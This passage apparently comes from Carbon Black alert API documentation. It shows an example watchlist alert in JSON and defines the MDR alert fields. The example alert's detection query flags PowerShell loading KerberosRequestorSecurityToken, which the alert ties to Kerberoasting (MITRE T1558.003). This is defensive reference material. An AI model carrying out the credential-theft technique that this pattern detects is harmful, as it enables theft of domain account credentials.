"report_link":"https://attack.mitre.org/techniques/T1558/003/",
"ioc_id":"b1c1ae83-f66b-4aa3-a496-363e296f4018",
"ioc_hit":"fileless_scriptload_cmdline:\"System.IdentityModel.Tokens.KerberosRequestorSecurityToken\" OR scriptload_content:\"System.IdentityModel.Tokens.KerberosRequestorSecurityToken\"",
"watchlists":[{
"id":"Ci7w5B4URg6HN60hatQMQ",
"name":"AMSI Threat Intelligence"
}],
"process_guid":"ABCD1234-0059e1e0-00003544-00000000-1d9b8db27a4d423",
"process_pid":13636,
"process_name":"c:\\windows\\system32\\windowspowershell\\v1.0\\powershell.exe",
"process_sha256":"d436e66c0d092508e4b85290815ab375695fa9013c7423a3a27fed4f1acf90bd",
"process_md5":"0499440c4b0783266183246e384c6657",
"process_reputation":"TRUSTED_WHITE_LIST",
"process_effective_reputation":"TRUSTED_WHITE_LIST",
"process_cmdline":"powershell.exe -NoLogo -InputFormat Text -NoExit -ExecutionPolicy Unrestricted -Command -",
"process_username":"NT AUTHORITY\\SYSTEM",
"process_issuer":["Microsoft Windows Production PCA 2011"],
"process_publisher":["Microsoft Windows"],
"parent_guid":"ABCD1234-0059e1e0-00002890-00000000-1d9a898aa24acc9",
"parent_pid":10384,
"parent_name":"c:\\program files\\unowhy\\hisqool manager\\hisqoolmanager.exe",
"parent_sha256":"4ab2c4932e01ab8460bd8bff5afb0c76e9e238c10ce47515be40c49f652d0282",
"parent_md5":"c7e583681f0958d4f5d32afd09d8084b",
"parent_reputation":"NOT_LISTED",
"parent_effective_reputation":"NOT_LISTED",
"parent_cmdline":"\"C:\\Program Files\\Unowhy\\HiSqool Manager\\HiSqoolManager.exe\" ",
"parent_username":"NT AUTHORITY\\SYSTEM",
"mdr_alert_notes_present":false,
"mdr_alert":false,
"ml_classification_final_verdict":"ANOMALOUS",
"ml_classification_global_prevalence":"MEDIUM",
"ml_classification_org_prevalence":"LOW"
}
Managed Detection and Response (MDR) Fields
These fields are included on all alert types for customers who subscribe to the MDR product.
Field Name | Definition | Datatype |
---|---|---|
mdr_alert |
Is the alert eligible for review by Carbon Black MDR Analysts? | Boolean
|
mdr_alert_notes_present |
Customer visible notes at the alert level that were added by a MDR analyst | Boolean
|
mdr_determination |
MDR updatable classification of the alert
|
Object |
mdr_workflow |
MDR-updatable workflow of the alert
|
Object |
Last modified on July 23, 2024